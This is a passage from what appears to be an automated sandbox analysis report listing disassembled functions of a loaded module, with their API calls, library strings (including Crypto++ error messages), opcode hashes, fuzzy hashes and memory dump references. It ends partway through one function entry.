                                                                                                          • Opcode ID: 22168cf77b157cbb4b45acab038be8e52e0752fd0ce361300fd48ffd8e303b9b
                                                                                                          • Instruction ID: 35e33082065721fe9e0d4a5f878af77c1319c79d62987784b524f33ba20c5609
                                                                                                          • Opcode Fuzzy Hash: 22168cf77b157cbb4b45acab038be8e52e0752fd0ce361300fd48ffd8e303b9b
                                                                                                          • Instruction Fuzzy Hash: BB1193B7900629BBCB10CFA5DC40EDFBB7CEF89654B018269F90497240D6749A05CBE0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F045A70 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 6F045AB9
                                                                                                          • VariantCopy.OLEAUT32(?,6F0B9C90), ref: 6F045AC1
                                                                                                          • VariantClear.OLEAUT32(?), ref: 6F045AE2
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F045AEF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ClearCopyException@8InitThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3826472263-0
                                                                                                          • Opcode ID: 4519770e8683b0b183397d5f66068c5c76906b787c1a7ba7a7363f4e6172ee26
                                                                                                          • Instruction ID: fdeaab492ea313bd196ef75b82a8443f66ba11752f7112ec4b14893b02e8267c
                                                                                                          • Opcode Fuzzy Hash: 4519770e8683b0b183397d5f66068c5c76906b787c1a7ba7a7363f4e6172ee26
                                                                                                          • Instruction Fuzzy Hash: 43118176904668FBCB01DF9CC884AEEFBB8FB45624F51416AE824A7241D7746A0487E1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F090A60 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                          • String ID:
                                                                                                          • API String ID: 3016257755-0
                                                                                                          • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                          • Instruction ID: a92e511396f2cfcd84a1add04e9aa6415f1f8c296aa9512f8096a9fe3c673467
                                                                                                          • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                          • Instruction Fuzzy Hash: C4117B3300824ABBCF024FA4DC11EEE7F62BB19354B49A515FE2859030E336D6B1BB81
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0797F0 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 310COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F071200: _memcpy_s.LIBCMT ref: 6F0712DD
                                                                                                            • Part of subcall function 6F072080: __CxxThrowException@8.LIBCMT ref: 6F072183
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F079BA3
                                                                                                          Strings
                                                                                                          • hMo, xrefs: 6F079882
                                                                                                          • InvertibleRSAFunction: computational error during private key operation, xrefs: 6F079B08
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw$_memcpy_s
                                                                                                          • String ID: InvertibleRSAFunction: computational error during private key operation$hMo
                                                                                                          • API String ID: 4047871975-3736018710
                                                                                                          • Opcode ID: 2ab4b096f67a02782b09e8ad4381f08250fda7bb3d47f1cac24e16b6bcc0590f
                                                                                                          • Instruction ID: 54fc6ec8d1de95a1ea8d3845db65706d94f2888b10ca689d5a93a7e62c8a7801
                                                                                                          • Opcode Fuzzy Hash: 2ab4b096f67a02782b09e8ad4381f08250fda7bb3d47f1cac24e16b6bcc0590f
                                                                                                          • Instruction Fuzzy Hash: 08C17D7110C3849BD334CB68C940BDFB7E9ABD9304F44891DE59983291EF75A908CBA7
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F088970 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 175COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove_memset
                                                                                                          • String ID: EncodingParameters
                                                                                                          • API String ID: 3555123492-55378216
                                                                                                          • Opcode ID: 2366e04118c14cab0f5199c7a85dfadb7a4a7acc5a7e84b926f8e6843ee1e030
                                                                                                          • Instruction ID: ca273fa413a19a66f2e6f4830626fa9a27f4f6574b720fa7faf8e6dccd3bc4a0
                                                                                                          • Opcode Fuzzy Hash: 2366e04118c14cab0f5199c7a85dfadb7a4a7acc5a7e84b926f8e6843ee1e030
                                                                                                          • Instruction Fuzzy Hash: 8E6111B4208341AFD704CF68C880B2AFBE9AFC9754F144A1DF59987391D7B4E941CBA2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F056920 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 128COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F056A34
                                                                                                          Strings
                                                                                                          • : this object does't support a special last block, xrefs: 6F0569BC
                                                                                                          • Do, xrefs: 6F056A9C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw
                                                                                                          • String ID: : this object does't support a special last block$Do
                                                                                                          • API String ID: 2005118841-2860760220
                                                                                                          • Opcode ID: ad012ca9c2098241ddec31cca89a78c3ebfb42ee9a1b4ba9a7d6a3d362d5a3f4
                                                                                                          • Instruction ID: a8415e2e6550588ab5cb7a0861c91afff9f4c4e6bec33f45b2b0db3f579e0691
                                                                                                          • Opcode Fuzzy Hash: ad012ca9c2098241ddec31cca89a78c3ebfb42ee9a1b4ba9a7d6a3d362d5a3f4
                                                                                                          • Instruction Fuzzy Hash: 5D4149752087809FC714DF28C880B5BBBE4BFD9618F508A1DF49993395EB35A904CB92
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F024100 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6F024175
                                                                                                          • _memmove.LIBCMT ref: 6F0241C6
                                                                                                            • Part of subcall function 6F024010: std::_Xinvalid_argument.LIBCPMT ref: 6F02402A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                          • String ID: string too long
                                                                                                          • API String ID: 2168136238-2556327735
                                                                                                          • Opcode ID: 3c3a04cfea5d909915a396d71a85954991b8b98cc480fb3fbbffede893488acd
                                                                                                          • Instruction ID: 3c9e71dc02f3a1a253f8012d10be6fdf7f17a73997d0a5ac09fd963c7558f6ea
                                                                                                          • Opcode Fuzzy Hash: 3c3a04cfea5d909915a396d71a85954991b8b98cc480fb3fbbffede893488acd
                                                                                                          • Instruction Fuzzy Hash: A931B53A310610ABD7219E9CEC80B5AF7EDFFA5664B600A1FE595C7682C761D8408BB1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F045380 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F045488
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F04549F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 4063778783-2241063504
                                                                                                          • Opcode ID: 76bdff6b98552fd47af5e1083875cf104a7ab5d13801b7341eba1474159cc789
                                                                                                          • Instruction ID: 4b3c8e1e340cc0ea4f707e2c7705839e971465327d232c90c99fca27bcc08a87
                                                                                                          • Opcode Fuzzy Hash: 76bdff6b98552fd47af5e1083875cf104a7ab5d13801b7341eba1474159cc789
                                                                                                          • Instruction Fuzzy Hash: 5F314D755087059FCB04DF28C480A9AB7F4FF89758F508A6EF4558B390E731E906CB92
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0454B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F045581
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F045598
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 4063778783-2241063504
                                                                                                          • Opcode ID: b0597e851220cf2e0c9535d23919f952921c33ae0017ff1e370d7fb60b6bee11
                                                                                                          • Instruction ID: 620e5c7e136ba0724ec24a2a450ef7f316bc76feaca1a29af72c48ad826886bf
                                                                                                          • Opcode Fuzzy Hash: b0597e851220cf2e0c9535d23919f952921c33ae0017ff1e370d7fb60b6bee11
                                                                                                          • Instruction Fuzzy Hash: E0314075504209AFCB04CF58D881E9BB7F9FF89714F40866EF55987690E730EA05CB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F05C350 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 104COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F05C39B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw
                                                                                                          • String ID: gfff$gfff
                                                                                                          • API String ID: 2005118841-3084402119
                                                                                                          • Opcode ID: 0fc975951894ecdd0a9fd187ee17f5a7dd85dbf523fbdf3c3300f41ba2466e2d
                                                                                                          • Instruction ID: ac0631a9b6ac924445e6a32fb4261276a602eb603bc5fcc36dbe6168da81dadf
                                                                                                          • Opcode Fuzzy Hash: 0fc975951894ecdd0a9fd187ee17f5a7dd85dbf523fbdf3c3300f41ba2466e2d
                                                                                                          • Instruction Fuzzy Hash: 36313F7190020DAFDB14CF98D980FBEB7B9EB84718F44851CE915972C4D770BA19CBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0218C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F024010: std::_Xinvalid_argument.LIBCPMT ref: 6F02402A
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F02194F
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          • std::exception::exception.LIBCMT ref: 6F02198E
                                                                                                            • Part of subcall function 6F0895C1: std::exception::operator=.LIBCMT ref: 6F0895DA
                                                                                                            • Part of subcall function 6F024010: std::_Xinvalid_argument.LIBCPMT ref: 6F024067
                                                                                                            • Part of subcall function 6F024010: _memmove.LIBCMT ref: 6F0240C8
                                                                                                          Strings
                                                                                                          • Clone() is not implemented yet., xrefs: 6F0218ED
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow_memmovestd::exception::exceptionstd::exception::operator=
                                                                                                          • String ID: Clone() is not implemented yet.
                                                                                                          • API String ID: 2192554526-226299721
                                                                                                          • Opcode ID: e37f896ac3748a7a9e64a45571931f5674432be76844040abb4744784d0145d6
                                                                                                          • Instruction ID: e550a52ceb52ee2a141700a189992aa2549c3c084d9d1cebdd3c72eb28d572a7
                                                                                                          • Opcode Fuzzy Hash: e37f896ac3748a7a9e64a45571931f5674432be76844040abb4744784d0145d6
                                                                                                          • Instruction Fuzzy Hash: 52315C75804248BFCB14CFD8D880BEEFBB8FB09724F50466EE425A7691DB755604CBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F055560 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 95COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F024010: std::_Xinvalid_argument.LIBCPMT ref: 6F02402A
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F055657
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          • StringStore: missing InputBuffer argument, xrefs: 6F0555E0
                                                                                                          • InputBuffer, xrefs: 6F0555BF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                                                                                          • String ID: InputBuffer$StringStore: missing InputBuffer argument
                                                                                                          • API String ID: 3718517217-2380213735
                                                                                                          • Opcode ID: eab1189d62805fc6ca414c7fb61b93a22f0f75da3d5c8151b3e4bb8ad3ed6fa4
                                                                                                          • Instruction ID: 4c468de462efbcb5499d1fe9d8fccb98d8e2001bbaf9524286ac719886310e72
                                                                                                          • Opcode Fuzzy Hash: eab1189d62805fc6ca414c7fb61b93a22f0f75da3d5c8151b3e4bb8ad3ed6fa4
                                                                                                          • Instruction Fuzzy Hash: 404167B55087809FC320CF69C590B5BFBE0BB99718F408A2EF5E987391DB759908CB52
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F021EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F024010: std::_Xinvalid_argument.LIBCPMT ref: 6F02402A
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F021F36
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          • std::exception::exception.LIBCMT ref: 6F021F6E
                                                                                                            • Part of subcall function 6F0895C1: std::exception::operator=.LIBCMT ref: 6F0895DA
                                                                                                            • Part of subcall function 6F024010: std::_Xinvalid_argument.LIBCPMT ref: 6F024067
